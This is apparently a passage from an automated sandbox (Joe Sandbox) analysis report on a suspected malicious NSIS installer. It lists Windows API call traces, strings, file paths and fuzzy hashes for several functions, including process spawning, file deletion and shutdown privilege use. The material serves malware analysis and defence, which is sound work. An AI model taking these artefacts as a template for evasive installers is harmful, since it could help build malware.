                                                                        • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,?), ref: 100014B1
                                                                        • GetTickCount.KERNEL32 ref: 100014BF
                                                                        • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 100014E6
                                                                        • GetTickCount.KERNEL32 ref: 100014F5
                                                                        • ReadFile.KERNEL32(?,100030B8,000003FF,?,00000000), ref: 10001511
                                                                        • lstrlenW.KERNEL32(?), ref: 10001542
                                                                        • lstrlenW.KERNEL32(?,100034B8,00000400), ref: 10001558
                                                                        • lstrcpynW.KERNEL32(00000000), ref: 1000155E
                                                                        • lstrlenW.KERNEL32(100034B8), ref: 1000156D
                                                                        • GlobalSize.KERNEL32(00000002), ref: 10001579
                                                                        • GlobalUnlock.KERNEL32(00000002), ref: 10001589
                                                                        • GlobalReAlloc.KERNEL32(00000002,00000903,00000042), ref: 1000159C
                                                                        • GlobalLock.KERNEL32(00000000), ref: 100015AE
                                                                        • lstrcatW.KERNEL32(?,100034B8), ref: 100015BB
                                                                        • GlobalSize.KERNEL32(00000002), ref: 100015CE
                                                                        • lstrlenW.KERNEL32(00000000), ref: 100015EE
                                                                        • lstrcpyW.KERNEL32(00000000, ), ref: 10001612
                                                                        • CharNextW.USER32(?), ref: 10001679
                                                                        • GetTickCount.KERNEL32 ref: 100016AB
                                                                        • TerminateProcess.KERNEL32(?,000000FF), ref: 100016BF
                                                                        • lstrcpyW.KERNEL32(?,timeout), ref: 100016D1
                                                                        • Sleep.KERNELBASE(00000064), ref: 100016DB
                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 100016E5
                                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 100016F5
                                                                        • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 10001706
                                                                        • lstrcpyW.KERNEL32(?,error), ref: 1000171D
                                                                        • lstrcpyW.KERNEL32(?,error), ref: 1000175F
                                                                        • wsprintfW.USER32 ref: 1000177D
                                                                        • CloseHandle.KERNEL32(?,?), ref: 1000179B
                                                                        • CloseHandle.KERNEL32(?), ref: 100017A0
                                                                        • CloseHandle.KERNEL32(?), ref: 100017A5
                                                                        • CloseHandle.KERNEL32(?), ref: 100017AA
                                                                        • CloseHandle.KERNEL32(?), ref: 100017AF
                                                                        • CloseHandle.KERNEL32(?), ref: 100017B4
                                                                        • DeleteFileW.KERNEL32(?), ref: 100017CD
                                                                        • GlobalFree.KERNEL32(?), ref: 100017DC
                                                                        • GlobalUnlock.KERNEL32(00000001), ref: 100017E6
                                                                        • GlobalFree.KERNEL32(00000001), ref: 100017EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1651374950.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000000.00000002.1651352139.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000000.00000002.1651814942.0000000010002000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000000.00000002.1651860547.0000000010003000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000000.00000002.1651876338.0000000010004000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_10000000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Global$File$Handle$Close$Createlstrlen$AllocPipeProcesslstrcpy$CountFreeTick$CharDeleteDescriptorFindLockModuleNameNamedPeekSecuritySizeUnlockViewWindowlstrcat$AddressCodeCopyCurrentDaclExitInfoInitializeMappingNextObjectPrevProcReadSingleSleepStartupTempTerminateUnmapVersionWaitlstrcmpilstrcpynwsprintf
                                                                        • String ID: $#32770$/OEM$/TIMEOUT=$SysListView32$error$timeout
                                                                        • API String ID: 4049317599-620579739
                                                                        • Opcode ID: 2eaa6d1bbf70ee58a3964e22a8506e291c69bc0a864cc5f426cb649f96b96720
                                                                        • Instruction ID: 5c68747c54cc819f90348a5b8123bd73389b7655e45d881dfec801426264fe78
                                                                        • Opcode Fuzzy Hash: 2eaa6d1bbf70ee58a3964e22a8506e291c69bc0a864cc5f426cb649f96b96720
                                                                        • Instruction Fuzzy Hash: 32221971900219EFFB11DFA4CC88AEEBBB9FF483C4F51406AE605A6169DB305E45CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph
                                                                        [Control-flow graph for the function at 0040335A (node addresses and called APIs), rendering data not reproduced]
                                                                        APIs
                                                                        • #17.COMCTL32 ref: 00403379
                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                        • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                          • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                          • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                          • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                        • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                          • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                        • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                        • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\160420241245287.exe",00000000), ref: 004033DB
                                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\160420241245287.exe",00000020), ref: 00403402
                                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040350B
                                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351C
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403528
                                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353C
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403544
                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403555
                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355D
                                                                        • DeleteFileW.KERNELBASE(1033), ref: 00403571
                                                                        • OleUninitialize.OLE32(?), ref: 00403621
                                                                        • ExitProcess.KERNEL32 ref: 00403641
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 0040364D
                                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\160420241245287.exe",00000000,?), ref: 00403659
                                                                        • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403665
                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366C
                                                                        • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\160420241245287.exe,0041FE90,00000001), ref: 004036DA
                                                                        • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                        • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                        • ExitProcess.KERNEL32 ref: 004037BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                        • String ID: "C:\Users\user\Desktop\160420241245287.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\opbevaringssteder$C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs$C:\Users\user\Desktop$C:\Users\user\Desktop\160420241245287.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                        • API String ID: 4107622049-4150488388
                                                                        • Opcode ID: 80b4d66530e30df5463f20323155bb533901e0ea7c2273a5282726b8b5686b27
                                                                        • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                        • Opcode Fuzzy Hash: 80b4d66530e30df5463f20323155bb533901e0ea7c2273a5282726b8b5686b27
                                                                        • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph
                                                                        [Control-flow graph for the function at 004052D3 (node addresses and called APIs), rendering data not reproduced]
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                        • GetClientRect.USER32(?,?), ref: 0040537E
                                                                        • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                          • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054AA
                                                                        • ShowWindow.USER32(00000000), ref: 004054CE
                                                                        • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                        • ShowWindow.USER32(00000008), ref: 0040551D
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                        • CreatePopupMenu.USER32 ref: 00405562
                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                        • GetWindowRect.USER32(?,?), ref: 00405596
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                        • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                        • EmptyClipboard.USER32 ref: 004055FD
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                        • CloseClipboard.USER32 ref: 00405658
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                        • String ID: {
                                                                        • API String ID: 4154960007-366298937
                                                                        • Opcode ID: 99f6d0e2163b3ed1e469e9123c156a5dd4617cf360879a3f8359da01de5b186a
                                                                        • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                        • Opcode Fuzzy Hash: 99f6d0e2163b3ed1e469e9123c156a5dd4617cf360879a3f8359da01de5b186a
                                                                        • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph
                                                                        • Function 00405F0C-0040617B, basic blocks 527-588; the rendered graph and its executed/not-executed colouring do not survive in text
                                                                        • Subfunctions called: 00405DB7, 00405E31, 00405EEA, 0040617E; recursive self-calls to 00405F0C at blocks 550 and 575
                                                                        APIs
                                                                        • GetVersion.KERNEL32(00000000,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,?,004051CB,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000), ref: 00405FCF
                                                                        • GetSystemDirectoryW.KERNEL32(ExecToStack,00000400), ref: 0040604D
                                                                        • GetWindowsDirectoryW.KERNEL32(ExecToStack,00000400), ref: 00406060
                                                                        • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                        • SHGetPathFromIDListW.SHELL32(?,ExecToStack), ref: 004060AA
                                                                        • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                        • lstrcatW.KERNEL32(ExecToStack,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                        • lstrlenW.KERNEL32(ExecToStack,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,?,004051CB,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000), ref: 00406133
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: the same twelve .sdmp regions (00400000 through 0048A000) listed under the first function record above
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                        • String ID: ExecToStack$Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 900638850-4014221499
                                                                        • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                        • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                        • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                        • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph
                                                                        • Function 00405772-00405932, basic blocks 589-645; the rendered graph and its executed/not-executed colouring do not survive in text
                                                                        • Subfunctions called: 00405194, 0040572A, 00405935, 00405981, 00405A3D, 00405D84, 00405EEA, 0040622D; recursive self-call to 00405772 at block 634 (00405875), inside the FindNextFileW loop
                                                                        APIs
                                                                        • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\160420241245287.exe"), ref: 0040579B
                                                                        • lstrcatW.KERNEL32(004246D8,\*.*), ref: 004057E3
                                                                        • lstrcatW.KERNEL32(?,00409014), ref: 00405806
                                                                        • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\160420241245287.exe"), ref: 0040580C
                                                                        • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\160420241245287.exe"), ref: 0040581C
                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                        • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                        Strings
                                                                        • "C:\Users\user\Desktop\160420241245287.exe", xrefs: 0040577B
                                                                        • \*.*, xrefs: 004057DD
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405780
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: the same twelve .sdmp regions (00400000 through 0048A000) listed under the first function record above
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\160420241245287.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                        • API String ID: 2035342205-2868644625
                                                                        • Opcode ID: 907ff43fcfdba52205f9394a3d7f513bd1de32a06ab12d058cf23db4451ea630
                                                                        • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                        • Opcode Fuzzy Hash: 907ff43fcfdba52205f9394a3d7f513bd1de32a06ab12d058cf23db4451ea630
                                                                        • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: the same twelve .sdmp regions (00400000 through 0048A000) listed under the first function record above
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                        • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                        • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                        • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,74DF2EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00406238
                                                                        • FindClose.KERNEL32(00000000), ref: 00406244
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: the same twelve .sdmp regions (00400000 through 0048A000) listed under the first function record above
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID: WB
                                                                        • API String ID: 2295610775-2854515933
                                                                        • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                        • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                        • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                        • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                        • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                        • String ID:
                                                                        • API String ID: 310444273-0
                                                                        • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                        • Instruction ID: 46d0f10fa6fb29b22d4bf355a321a76136a9e9be6b3571ea53230c25cba9bd22
                                                                        • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                        • Instruction Fuzzy Hash: 02E0CD36A08120ABC7115B309D44D6773BCAFE9601305053DF505F6240C774AC1297A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (function 004038B4; legend: Executed / Not Executed; rendered basic-block graph omitted, its API calls are listed under APIs below)
                                                                        APIs
                                                                          • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                          • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                          • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                        • lstrcatW.KERNEL32(1033,004226D0), ref: 00403935
                                                                        • lstrlenW.KERNEL32(ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Roaming\opbevaringssteder,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B5
                                                                        • lstrcmpiW.KERNEL32(?,.exe,ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Roaming\opbevaringssteder,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                        • GetFileAttributesW.KERNEL32(ExecToStack), ref: 004039D3
                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\opbevaringssteder), ref: 00403A1C
                                                                          • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                        • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AED
                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                        • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                        • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
